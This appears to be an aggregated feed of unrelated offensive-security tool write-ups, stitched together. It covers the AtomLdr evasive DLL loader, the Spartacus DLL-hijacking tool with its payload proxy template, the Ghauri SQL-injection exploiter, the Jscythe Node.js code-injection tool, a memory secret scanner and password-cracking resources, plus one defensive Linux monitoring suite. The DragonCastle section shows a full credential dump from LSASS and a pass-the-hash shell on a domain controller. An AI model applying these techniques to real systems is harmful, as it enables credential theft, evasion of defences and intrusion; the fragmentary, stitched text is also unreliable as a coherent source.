Enumerate all processes with the names pwsh,powershell,spotify and exclude instances where the integrity level is untrusted or low and exclude 32-bit processes
C:\> wanderer --name pwsh,powershell,spotify --exclude-integrity untrusted,low --exclude-32

Screenshots

Example 1

Example 2

Example 3

Example 4

Example 5



New Mockingjay Process Injection Technique Could Let Malware Evade Detection

A new process injection technique dubbed Mockingjay could be exploited by threat actors to bypass security solutions to execute malicious code on compromised systems. "The injection is executed without space allocation, setting permissions or even starting a thread," Security Joes researchers Thiago Peixoto, Felipe Duarte, and Ido NaorΒ saidΒ in a report shared with The Hacker News. "The

LSMS - Linux Security And Monitoring Scripts

By: Zion3R

These are a collection of security and monitoring scripts you can use to monitor your Linux installation for security-related events or for an investigation. Each script works on its own and is independent of other scripts. The scripts can be set up to either print out their results, send them to you via mail, or using AlertR as notification channel.


Repository Structure

The scripts are located in the directory scripts/. Each script contains a short summary in the header of the file with a description of what it is supposed to do, (if needed) dependencies that have to be installed and (if available) references to where the idea for this script stems from.

Each script has a configuration file in the scripts/config/ directory to configure it. If the configuration file was not found during the execution of the script, the script will fall back to default settings and print out the results. Hence, it is not necessary to provide a configuration file.

The scripts/lib/ directory contains code that is shared between different scripts.

Scripts using a monitor_ prefix hold a state and are only useful for monitoring purposes. A single usage of them for an investigation will only result in showing the current state the Linux system and not changes that might be relevant for the system's security. If you want to establish the current state of your system as benign for these scripts, you can provide the --init argument.

Usage

Take a look at the header of the script you want to execute. It contains a short description what this script is supposed to do and what requirements are needed (if any needed at all). If requirements are needed, install them before running the script.

The shared configuration file scripts/config/config.py contains settings that are used by all scripts. Furthermore, each script can be configured by using the corresponding configuration file in the scripts/config/ directory. If no configuration file was found, a default setting is used and the results are printed out.

Finally, you can run all configured scripts by executing start_search.py (which is located in the main directory) or by executing each script manually. A Python3 interpreter is needed to run the scripts.

Monitoring

If you want to use the scripts to monitor your Linux system constantly, you have to perform the following steps:

  1. Set up a notification channel that is supported by the scripts (currently printing out, mail, or AlertR).

  2. Configure the scripts that you want to run using the configuration files in the scripts/config/ directory.

  3. Execute start_search.py with the --init argument to initialize the scripts with the monitor_ prefix and let them establish a state of your system. However, this assumes that your system is currently uncompromised. If you are unsure of this, you should verify its current state.

  4. Set up a cron job as root user that executes start_search.py (e.g., 0 * * * * root /opt/LSMS/start_search.py to start the search hourly).

List of Scripts

Name Script
Monitoring cron files monitor_cron.py
Monitoring /etc/hosts file monitor_hosts_file.py
Monitoring /etc/ld.so.preload file monitor_ld_preload.py
Monitoring /etc/passwd file monitor_passwd.py
Monitoring modules monitor_modules.py
Monitoring SSH authorized_keys files monitor_ssh_authorized_keys.py
Monitoring systemd unit files monitor_systemd_units.py
Search executables in /dev/shm search_dev_shm.py
Search fileless programs (memfd_create) search_memfd_create.py
Search hidden ELF files search_hidden_exe.py
Search immutable files search_immutable_files.py
Search kernel thread impersonations search_non_kthreads.py
Search processes that were started by a now disconnected SSH session search_ssh_leftover_processes.py
Search running deleted programs search_deleted_exe.py
Test script to check if alerting works test_alert.py
Verify integrity of installed .deb packages verify_deb_packages.py


AtomLdr - A DLL Loader With Advanced Evasive Features

By: Zion3R


A DLL Loader With Advanced Evasive Features

Features:

  • CRT library independent.
  • The final DLL file, can run the payload by loading the DLL (executing its entry point), or by executing the exported "Atom" function via the command line.
  • DLL unhooking from \KnwonDlls\ directory, with no RWX sections.
  • The encrypted payload is saved in the resource section and retrieved via custom code.
  • AES256-CBC Payload encryption using custom no table/data-dependent branches using ctaes; this is one of the best custom AES implementations I've encountered.
  • Aes Key & Iv Encryption.
  • Indirect syscalls, utilizing HellHall with ROP gadgets (for the unhooking part).
  • Payload injection using APC calls - alertable thread.
  • Payload execution using APC - alertable thread.
  • Api hashing using two different implementations of the CRC32 string hashing algorithm.
  • The total Size is 17kb + payload size (multiple of 16).

How Does The Unhooking Part Work

AtomLdr's unhooking method looks like the following

the program Unhooking from the \KnwonDlls\ directory is not a new method to bypass user-land hooks. However, this loader tries to avoid allocating RWX memory when doing so. This was obligatory to do in KnownDllUnhook for example, where RWX permissions were needed to replace the text section of the hooked modules, and at the same time allow execution of functions within these text sections.

This was changed in this loader, where it suspends the running threads, in an attempt to block any function from being called from within the targetted text sections, thus eliminating the need of having them marked as RWX sections before unhooking, making RW permissions a possible choice.

This approach, however, created another problem; when unhooking, NtProtectVirtualMemory syscall and others were using the syscall instruction inside of ntdll.dll module, as an indirect-syscall approach. Still, as mentioned above, the unhooked modules will be marked as RW sections, making it impossible to perform indirect syscalls, because the syscall instruction that we were jumping to, can't be executed now, so we had to jump to another executable place, this is where win32u.dll was used.

win32u.dll contains some syscalls that are GUI-related functions, making it suitable to jump to instead of ntdll.dll. win32u.dll is loaded (statically), but not included in the unhooking routine, which is done to insure that win32u.dll can still execute the syscall instruction we are jumping to.

The suspended threads after that are resumed.

It is worth mentioning that this approach may not be that efficient, and can be unstable, that is due to the thread suspension trick used. However, it has been tested with multiple processes with positive results, in the meantime, if you encountered any problems, feel free to open an issue.


Usage

  • PayloadBuilder is compiled and executed with the specified payload, it will output a PayloadConfig.pc file, that contains the encrypted payload, and its encrypted key and iv.
  • The generated PayloadConfig.pc file will then replace this in the AtomLdr project.
  • Compile the AtomLdr project as x64 Release.
  • To enable debug mode, uncomment this here.

Demo (1)

  • Executing AtomLdr.dll using rundll32.exe, running Havoc payload, and capturing a screenshot

  • AtomLdr.dll's Import Address Table


Demo - Debug Mode(2)

  • Running PayloadBuilder.exe, to encrypt demon[111].bin - a Havoc payload file


  • Running AtomLdr.dll using rundll32.exe


  • Havoc capturing a screenshot, after payload execution


Based on



Spartacus - DLL Hijacking Discovery Tool

By: Zion3R


Why "Spartacus"?

If you have seen the film Spartacus from 1960, you will remember the scene where the Romans are asking for Spartacus to give himself up. The moment the real Spartacus stood up, a lot of others stood up as well and claimed to be him using the "I AM SPARTACUS" phrase.

When a process that is vulnerable to DLL Hijacking is asking for a DLL to be loaded, it's kind of asking "WHO IS VERSION.DLL?" and random directories start claiming "I AM VERSION.DLL" and "NO, I AM VERSION.DLL". And thus, Spartacus.

Did you really make yet another DLL Hijacking discovery tool?

...but with a twist as Spartacus is utilising the SysInternals Process Monitor and is parsing raw PML log files. You can leave ProcMon running for hours and discover 2nd and 3rd level (ie an app that loads another DLL that loads yet another DLL when you use a specific feature of the parent app) DLL Hijacking vulnerabilities. It will also automatically generate proxy DLLs with all relevant exports for vulnerable DLLs.


Features

  • Parsing ProcMon PML files natively. The config (PMC) and log (PML) parsers have been implemented by porting partial functionality to C# from https://github.com/eronnen/procmon-parser/. You can find the format specification here.
  • Spartacus will create proxy DLLs for all missing DLLs that were identified. For instance, if an application is vulnerable to DLL Hijacking via version.dll, Spartacus will create a version.dll.cpp file for you with all the exports included in it. Then you can insert your payload/execution technique and compile.
  • Able to process large PML files and store all DLLs of interest in an output CSV file. Local benchmark processed a 3GB file with 8 million events in 45 seconds.
  • [Defence] Monitoring mode trying to identify running applications proxying calls, as in "DLL Hijacking in progress". This is just to get any low hanging fruit and should not be relied upon.
  • Able to create proxies for export functions in order to avoid using DllMain. This technique was inspired and implemented from the walkthrough described at https://www.redteam.cafe/red-team/dll-sideloading/dll-sideloading-not-by-dllmain, by Shantanu Khandelwal. For this to work Ghidra is required.

Screenshots

Spartacus Execution

CSV Output

Output Exports

Export DLL Functions

Usage

Execution Flow

  1. Generate a ProcMon (PMC) config file on the fly, based on the arguments passed. The filters that will be set are:
    • Operation is CreateFile.
    • Path ends with .dll.
    • Process name is not procmon.exe or procmon64.exe.
    • Enable Drop Filtered Events to ensure minimum PML output size.
    • Disable Auto Scroll.
  2. Execute Process Monitor.
  3. Halt its execution until the user presses ENTER.
  4. Terminates Process Monitor.
  5. Parses the output Event Log (PML) file.
    1. Creates a CSV file with all the NAME_NOT_FOUND and PATH_NOT_FOUND DLLs.
    2. Compares the DLLs from above and tries to identify the DLLs that were actually loaded.
    3. For every "found" DLL it generates a proxy DLL with all its export functions.

Command Line Arguments

Argument Description
--pml Location (file) to store the ProcMon event log file. If the file exists, it will be overwritten. When used with --existing-log it will indicate the event log file to read from and will not be overwritten.
--pmc Define a custom ProcMon (PMC) file to use. This file will not be modified and will be used as is.
--csv Location (file) to store the CSV output of the execution. This file will include only the DLLs that were marked as NAME_NOT_FOUND, PATH_NOT_FOUND, and were in user-writable locations (it excludes anything in the Windows and Program Files directories)
--exe Define process names (comma separated) that you want to track, helpful when you are interested only in a specific process.
--exports Location (folder) in which all the proxy DLL files will be saved. Proxy DLL files will only be generated if this argument is used.
--procmon Location (file) of the SysInternals Process Monitor procmon.exe or procmon64.exe
--proxy-dll-template Define a DLL template to use for generating the proxy DLL files. Only relevant when --exports is used. All #pragma exports are inserted by replacing the %_PRAGMA_COMMENTS_% string, so make sure your template includes that string in the relevant location.
--existing-log Switch to indicate that Spartacus should process an existing ProcMon event log file (PML). To indicate the event log file use --pml, useful when you have been running ProcMon for hours or used it in Boot Logging.
--all By default any DLLs in the Windows or Program Files directories will be skipped. Use this to include those directories in the output.
--detect Try to identify DLLs that are proxying calls (like 'DLL Hijacking in progress'). This isn't a feature to be relied upon, it's there to get the low hanging fruit.
--verbose Enable verbose output.
--debug Enable debug output.
--generate-proxy Switch to indicate that Spartacus will be creating proxy functions for all identified export functions.
--ghidra Used only with --generate-proxy. Absolute path to Ghidra's 'analyzeHeadless.bat' file.
--dll Used only with --generate-proxy. Absolute path to the DLL you want to proxy.
--output-dir Used only with --generate-proxy. Absolute path to the directory where the solution of the proxy will be stored. This directory should not exist, and will be auto-created.
--only-proxy Used only with --generate-proxy. Comma separated string to indicate functions to clone. Such as 'WTSFreeMemory,WTSFreeMemoryExA,WTSSetUserConfigA'

Examples

Collect all events and save them into C:\Data\logs.pml. All vulnerable DLLs will be saved as C:\Data\VulnerableDLLFiles.csv and all proxy DLLs in C:\Data\DLLExports.

--procmon C:\SysInternals\Procmon.exe --pml C:\Data\logs.pml --csv C:\Data\VulnerableDLLFiles.csv --exports C:\Data\DLLExports --verbose

Collect events only for Teams.exe and OneDrive.exe.

--procmon C:\SysInternals\Procmon.exe --pml C:\Data\logs.pml --csv C:\Data\VulnerableDLLFiles.csv --exports C:\Data\DLLExports --verbose --exe "Teams.exe,OneDrive.exe"

Collect events only for Teams.exe and OneDrive.exe, and use a custom proxy DLL template at C:\Data\myProxySkeleton.cpp.

--procmon C:\SysInternals\Procmon.exe --pml C:\Data\logs.pml --csv C:\Data\VulnerableDLLFiles.csv --exports C:\Data\DLLExports --verbose --exe "Teams.exe,OneDrive.exe" --proxy-dll-template C:\Data\myProxySkeleton.cpp

Collect events only for Teams.exe and OneDrive.exe, but don't generate proxy DLLs.

--procmon C:\SysInternals\Procmon.exe --pml C:\Data\logs.pml --csv C:\Data\VulnerableDLLFiles.csv --verbose --exe "Teams.exe,OneDrive.exe"

Parse an existing PML event log output, save output to CSV, and generate proxy DLLs.

--existing-log --pml C:\MyData\SomeBackup.pml --csv C:\Data\VulnerableDLLFiles.csv --exports C:\Data\DLLExports

Run in monitoring mode and try to detect any applications that is proxying DLL calls.

--detect

Create proxies for all identified export functions.

--generate-proxy --ghidra C:\ghidra\support\analyzeHeadless.bat --dll C:\Windows\System32\userenv.dll --output-dir C:\Projects\spartacus-wtsapi32 --verbose

Create a proxy only for a specific export function.

--generate-proxy --ghidra C:\ghidra\support\analyzeHeadless.bat --dll C:\Windows\System32\userenv.dll --output-dir C:\Projects\spartacus-wtsapi32 --verbose --only-proxy "ExpandEnvironmentStringsForUserW"

Note: When generating proxies for export functions, the solution that is created also replicates VERSIONINFO and timestomps the target DLL to match the date of the source one (using PowerShell).

Proxy DLL Template

Below is the template that is used when generating proxy DLLs, the generated #pragma statements are inserted by replacing the %_PRAGMA_COMMENTS_% string.

The only thing to be aware of is that the pragma DLL will be using a hardcoded path of its location rather than trying to load it dynamically.

#pragma once

%_PRAGMA_COMMENTS_%

#include <windows.h>
#include <string>
#include <atlstr.h>

VOID Payload() {
// Run your payload here.
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
Payload();
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}

If you wish to use your own template, just make sure the %_PRAGMA_COMMENTS_% is in the right place.

Contributions

Whether it's a typo, a bug, or a new feature, Spartacus is very open to contributions as long as we agree on the following:

  • You are OK with the MIT license of this project.
  • Before creating a pull request, create an issue so it could be discussed before doing any work as internal development is not tracked via the public GitHub repository. Otherwise you risk having a pull request rejected if for example we are already working on the same/similar feature, or for any other reason.

Credits



Ghauri - An Advanced Cross-Platform Tool That Automates The Process Of Detecting And Exploiting SQL Injection Security Flaws


An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws


Requirements

  • Python 3
  • Python pip3

Installation

  • cd to ghauri directory.
  • install requirements: python3 -m pip install --upgrade -r requirements.txt
  • run: python3 setup.py install or python3 -m pip install -e .
  • you will be able to access and run the ghauri with simple ghauri --help command.

Download Ghauri

You can download the latest version of Ghauri by cloning the GitHub repository.

git clone https://github.com/r0oth3x49/ghauri.git

Features

  • Supports following types of injection payloads:
    • Boolean based.
    • Error Based
    • Time Based
    • Stacked Queries
  • Support SQL injection for following DBMS.
    • MySQL
    • Microsoft SQL Server
    • Postgre
    • Oracle
  • Supports following injection types.
    • GET/POST Based injections
    • Headers Based injections
    • Cookies Based injections
    • Mulitipart Form data injections
    • JSON based injections
  • support proxy option --proxy.
  • supports parsing request from txt file: switch for that -r file.txt
  • supports limiting data extraction for dbs/tables/columns/dump: swicth --start 1 --stop 2
  • added support for resuming of all phases.
  • added support for skip urlencoding switch: --skip-urlencode
  • added support to verify extracted characters in case of boolean/time based injections.

Advanced Usage


Author: Nasir khan (r0ot h3x49)

usage: ghauri -u URL [OPTIONS]

A cross-platform python based advanced sql injections detection & exploitation tool.

General:
-h, --help Shows the help.
--version Shows the version.
-v VERBOSE Verbosity level: 1-5 (default 1).
--batch Never ask for user input, use the default behavior
--flush-session Flush session files for current target

Target:
At least one of these options has to be provided to define the
target(s)

-u URL, --url URL Target URL (e.g. 'http://www.site.com/vuln.php?id=1).
-r REQUESTFILE Load HTTP request from a file

Request:
These options can be used to specify how to connect to the target URL

-A , --user-agent HTTP User-Agent header value -H , --header Extra header (e.g. "X-Forwarded-For: 127.0.0.1")
--host HTTP Host header value
--data Data string to be sent through POST (e.g. "id=1")
--cookie HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
--referer HTTP Referer header value
--headers Extra headers (e.g. "Accept-Language: fr\nETag: 123")
--proxy Use a proxy to connect to the target URL
--delay Delay in seconds between each HTTP request
--timeout Seconds to wait before timeout connection (default 30)
--retries Retries when the connection related error occurs (default 3)
--skip-urlencode Skip URL encoding of payload data
--force-ssl Force usage of SSL/HTTPS

Injection:
These options can be used to specify which paramete rs to test for,
provide custom injection payloads and optional tampering scripts

-p TESTPARAMETER Testable parameter(s)
--dbms DBMS Force back-end DBMS to provided value
--prefix Injection payload prefix string
--suffix Injection payload suffix string

Detection:
These options can be used to customize the detection phase

--level LEVEL Level of tests to perform (1-3, default 1)
--code CODE HTTP code to match when query is evaluated to True
--string String to match when query is evaluated to True
--not-string String to match when query is evaluated to False
--text-only Compare pages based only on the textual content

Techniques:
These options can be used to tweak testing of specific SQL injection
techniques

--technique TECH SQL injection techniques to use (default "BEST")
--time-sec TIMESEC Seconds to delay the DBMS response (default 5)

Enumeration:
These options can be used to enumerate the back-end database
managment system information, structure and data contained in the
tables.

-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--hostname Retrieve DBMS server hostname
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--dump Dump DBMS database table entries
-D DB DBMS database to enumerate
-T TBL DBMS database tables(s) to enumerate
-C COLS DBMS database table column(s) to enumerate
--start Retrive entries from offset for dbs/tables/columns/dump
--stop Retrive entries till offset for dbs/tables/columns/dump

Example:
ghauri http://www.site.com/vuln.php?id=1 --dbs

Legal disclaimer

Usage of Ghauri for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local,state and federal laws.
Developer assume no liability and is not responsible for any misuse or damage caused by this program.

TODO

  • Add support for inline queries.
  • Add support for Union based queries


DragonCastle - A PoC That Combines AutodialDLL Lateral Movement Technique And SSP To Scrape NTLM Hashes From LSASS Process


A PoC that combines AutodialDLL lateral movement technique and SSP to scrape NTLM hashes from LSASS process.

Description

Upload a DLL to the target machine. Then it enables remote registry to modify AutodialDLL entry and start/restart BITS service. Svchosts would load our DLL, set again AutodiaDLL to default value and perform a RPC request to force LSASS to load the same DLL as a Security Support Provider. Once the DLL is loaded by LSASS, it would search inside the process memory to extract NTLM hashes and the key/IV.

The DLLMain always returns False so the processes doesn't keep it.


Caveats

It only works when RunAsPPL is not enabled. Also I only added support to decrypt 3DES because I am lazy, but should be easy peasy to add code for AES. By the same reason, I only implemented support for next Windows versions:

Build Support
Windows 10 version 21H2
Windows 10 version 21H1 Implemented
Windows 10 version 20H2 Implemented
Windows 10 version 20H1 (2004) Implemented
Windows 10 version 1909 Implemented
Windows 10 version 1903 Implemented
Windows 10 version 1809 Implemented
Windows 10 version 1803 Implemented
Windows 10 version 1709 Implemented
Windows 10 version 1703 Implemented
Windows 10 version 1607 Implemented
Windows 10 version 1511
Windows 10 version 1507
Windows 8
Windows 7

The signatures/offsets/structs were taken from Mimikatz. If you want to add a new version just check sekurlsa functionality on Mimikatz.

Usage

credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line -dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter -target-ip ip address IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it -local-dll dll to plant DLL location (local) that will be planted on target -remote-dll dll location Path used to update AutodialDLL registry value" dir="auto">
psyconauta@insulanova:~/Research/dragoncastle|β‡’  python3 dragoncastle.py -h                                                                                                                                            
DragonCastle - @TheXC3LL


usage: dragoncastle.py [-h] [-u USERNAME] [-p PASSWORD] [-d DOMAIN] [-hashes [LMHASH]:NTHASH] [-no-pass] [-k] [-dc-ip ip address] [-target-ip ip address] [-local-dll dll to plant] [-remote-dll dll location]

DragonCastle - A credential dumper (@TheXC3LL)

optional arguments:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
valid username
-p PASSWORD, --password PASSWORD
valid password (if omitted, it will be asked unless -no-pass)
-d DOMAIN, --domain DOMAIN
valid doma in name
-hashes [LMHASH]:NTHASH
NT/LM hashes (LM hash can be empty)
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line
-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
-target-ip ip address
IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it
-local-dll dll to plant
DLL location (local) that will be planted on target
-remote-dll dll location
Path used to update AutodialDLL registry value
</ pre>

Example

Windows server on 192.168.56.20 and Domain Controller on 192.168.56.10:

psyconauta@insulanova:~/Research/dragoncastle|β‡’  python3 dragoncastle.py -u vagrant -p 'vagrant' -d WINTERFELL -target-ip 192.168.56.20 -remote-dll "c:\dump.dll" -local-dll DragonCastle.dll                          
DragonCastle - @TheXC3LL


[+] Connecting to 192.168.56.20
[+] Uploading DragonCastle.dll to c:\dump.dll
[+] Checking Remote Registry service status...
[+] Service is down!
[+] Starting Remote Registry service...
[+] Connecting to 192.168.56.20
[+] Updating AutodialDLL value
[+] Stopping Remote Registry Service
[+] Checking BITS service status...
[+] Service is down!
[+] Starting BITS service
[+] Downloading creds
[+] Deleting credential file
[+] Parsing creds:

============
----
User: vagrant
Domain: WINTERFELL
----
User: vagrant
Domain: WINTERFELL
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977 b98c6c9282c5c478be1d97b237b8
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977b98c6c9282c5c478be1d97b237b8
----
User: vagrant
Domain: WINTERFELL
NTLM: e02bc503339d51f71d913c245d35b50b
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: WINTERFELL$
Domain: SEVENKINGDOMS
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: UMFD-0
Domain: Font Driver Host
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User:
Domain:
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User:
Domain:

============
[+] Deleting DLL

[^] Have a nice day!
psyconauta@insulanova:~/Research/dragoncastle|β‡’  wmiexec.py -hashes :d977b98c6c9282c5c478be1d97b237b8 SEVENKINGDOMS/eddard.stark@192.168.56.10          
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
sevenkingdoms\eddard.stark

C:\>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivile ge Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege En able computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

C:\>

Author

Juan Manuel FernΓ‘ndez (@TheXC3LL)

References



Dismember - Scan Memory For Secrets And More


Dismember is a command-line toolkit for Linux that can be used to scan the memory of all processes (or particular ones) for common secrets and custom regular expressions, among other things.

It will eventually become a full /proc toolkit.

Using the grep command, it can match a regular expression across all memory for all (accessible) processes. This could be used to find sensitive data in memory, identify a process by something included in its memory, or to interrogate a processes' memory for interesting information.

There are many built-in patterns included via the scan command, which effectively works as a secret scanner against the memory on your machine.

Dismember can be used to search memory of all processes it has access to, so running it as root is the most effective method.

Commands are also included to list processes, explore process status and related information, draw process trees, and more...


Main Commands

Command Description
grep Search process memory for a given string or regex
scan Search process memory for a set of predefined secret patterns

Utility Commands

Command Description
files Show a list of files being accessed by a process
find Find a PID given a process name. If multiple processes match, the first one is returned.
info Show information about a process
kernel Show information about the kernel
kill Kill a process (or processes) using SIGKILL
list List all processes currently available on the system
resume Resume a suspended process using SIGCONT
suspend Suspend a process using SIGSTOP (use 'dismember resume' to leave suspension)
tree Show a tree diagram of a process and all children (defaults to PID 1).

Installation

Grab a binary from the latest release and add it to your path.

Usage Examples

Search for a pattern in a process by PID

# search memory owned by process 1234
dismember grep -p 1234 'the password is .*'

Search for a pattern in a process by name

# search memory owned by processes named "nginx" for a login form submission
dismember grep -n nginx 'username=liamg&password=.*'

Search for a pattern across all processes

# find a github api token across all processes
dismember grep 'gh[pousr]_[0-9a-zA-Z]{36}'

Search for secrets in memory across all processes

# search all accessible memory for common secrets
dismember scan

FAQ

Isn't this information all just sitting in /proc?

Pretty much. Dismember just reads and presents it for the most part. If you can get away with grep whatever /proc/[pid]/blah then go for it! I built this as an educational experience because I couldn't sleep one night and stayed up late reading the proc man-pages (I live an extremely rock 'n' roll lifestyle). It's not a replacement for existing tools, but perhaps it can complement them.

Do you know how horrific some of these commands seem when read out of context?

Yes.



Jscythe - Abuse The Node.Js Inspector Mechanism In Order To Force Any Node.Js/Electron/V8 Based Process To Execute Arbitrary Javascript Code


jscythe abuses the node.js inspector mechanism in order to force any node.js/electron/v8 based process to execute arbitrary javascript code, even if their debugging capabilities are disabled.

Tested and working against Visual Studio Code, Discord, any Node.js application and more!

How

  1. Locate the target process.
  2. Send SIGUSR1 signal to the process, this will enable the debugger on a port (depending on the software, sometimes it's random, sometimes it's not).
  3. Determine debugging port by diffing open ports before and after sending SIGUSR1.
  4. Get the websocket debugging URL and session id from http://localhost:<port>/json.
  5. Send a Runtime.evaluate request with the provided code.
  6. Profit.

Building

cargo build --release

Running

Target a specific process and execute a basic expression:

./target/debug/jscythe --pid 666 --code "5 - 3 + 2"

Execute code from a file:

./target/debug/jscythe --pid 666 --script example_script.js

The example_script.js can require any node module and execute any code, like:

require('child_process').spawnSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator', { encoding : 'utf8' }).stdout

Search process by expression:

./target/debug/jscythe --search extensionHost --script example_script.js

Other options

Run jscythe --help for the complete list of options.

License

This project is made with β™₯ by @evilsocket and it is released under the GPL3 license.


Awesome-Password-Cracking - A Curated List Of Awesome Tools, Research, Papers And Other Projects Related To Password Cracking And Password Security


A curated list of awesome tools, research, papers and other projects related to password cracking and password security.

Read the guidelines before contributing! In short:


Books

Cloud

  • Cloud_crack - Crack passwords using Terraform and AWS.
  • Cloudcat - A script to automate the creation of cloud infrastructure for hash cracking.
  • Cloudstomp - Automated deployment of instances on EC2 via plugin for high CPU/GPU applications at the lowest price.
  • Cloudtopolis - A tool that facilitates the installation and provisioning of Hashtopolis on the Google Cloud Shell platform, quickly and completely unattended (and also, free!).
  • NPK - NPK is a distributed hash-cracking platform built entirely of serverless components in AWS including Cognito, DynamoDB, and S3.
  • Penglab - Abuse of Google Colab for cracking hashes.
  • Rook - Automates the creation of AWS p3 instances for use in GPU-based password cracking.

Conversion

  • 7z2hashcat - Extract information from password-protected .7z archives (and .sfx files) such that you can crack these "hashes" with hashcat.
  • MacinHash - Convert macOS plist password file to hash file for password crackers.
  • NetNTLM-Hashcat - Converts John The Ripper/Cain format hashes (singular, or in bulk) to HashCat compatible hash format.
  • Rubeus-to-Hashcat - Converts / formats Rubeus kerberoasting output into hashcat readable format.
  • WINHELLO2hashcat - With this tool one can extract the "hash" from a WINDOWS HELLO PIN. This hash can be cracked with Hashcat.
  • bitwarden2hashcat - A tool that converts Bitwarden's data into a hashcat-suitable hash.
  • hc_to_7z - Convert 7-Zip hashcat hashes back to 7z archives.
  • hcxtools - Portable solution for conversion of cap/pcap/pcapng (gz compressed) WiFi dump files to hashcat formats.
  • itunes_backup2hashcat - Extract the information needed from the Manifest.plist files to convert it to hashes compatible with hashcat.
  • mongodb2hashcat - Extract hashes from the MongoDB database server to a hash format that hashcat accepts: -m 24100 (SCRAM-SHA-1) or -m 24200 (SCRAM-SHA-256).

Hashcat

Hashcat is the "World's fastest and most advanced password recovery utility." The following are projects directly related to Hashcat in one way or another.

  • Autocrack - A set of client and server tools for automatically, and lightly automatically cracking hashes.
  • docker-hashcat - Latest hashcat docker for Ubuntu 18.04 CUDA, OpenCL, and POCL.
  • Hashcat-Stuffs - Collection of hashcat lists and things.
  • hashcat-utils - Small utilities that are useful in advanced password cracking.
  • Hashfilter - Read a hashcat potfile and parse different types into a sqlite database.
  • known_hosts-hashcat - A guide and tool for cracking ssh known_hosts files with hashcat.
  • pyhashcat - Python C API binding to libhashcat.

Automation

  • autocrack - Hashcat wrapper to help automate the cracking process.
  • hashcat.launcher - A cross-platform app that run and control hashcat.
  • hat - An Automated Hashcat Tool for common wordlists and rules to speed up the process of cracking hashes during engagements.
  • hate_crack - A tool for automating cracking methodologies through Hashcat from the TrustedSec team.
  • Naive hashcat - Naive hashcat is a plug-and-play script that is pre-configured with naive, emperically-tested, "good enough" parameters/attack types.

Distributed cracking

  • CrackLord - Queue and resource system for cracking passwords.
  • fitcrack - A hashcat-based distributed password cracking system.
  • Hashtopolis - A multi-platform client-server tool for distributing hashcat tasks to multiple computers.
  • Kraken - A multi-platform distributed brute-force password cracking system.

Rules

  • clem9669 rules - Rule for hashcat or john.
  • hashcat rules collection - Probably the largest collection of hashcat rules out there.
  • Hob0Rules - Password cracking rules for Hashcat based on statistics and industry patterns.
  • Kaonashi - Wordlist, rules and masks from Kaonashi project (RootedCON 2019).
  • nsa-rules - Password cracking rules and masks for hashcat generated from cracked passwords.
  • nyxgeek-rules - Custom password cracking rules for Hashcat and John the Ripper.
  • OneRuleToRuleThemAll - "One rule to crack all passwords. or atleast we hope so."
  • pantagrule - Large hashcat rulesets generated from real-world compromised passwords.

Rule tools

  • duprule - Detect & filter duplicate hashcat rules.

Web interfaces

  • crackerjack - CrackerJack is a Web GUI for Hashcat developed in Python.
  • CrackQ - A Python Hashcat cracking queue system.
  • hashpass - Hash cracking WebApp & Server for hashcat.
  • Hashview - A web front-end for password cracking and analytics.
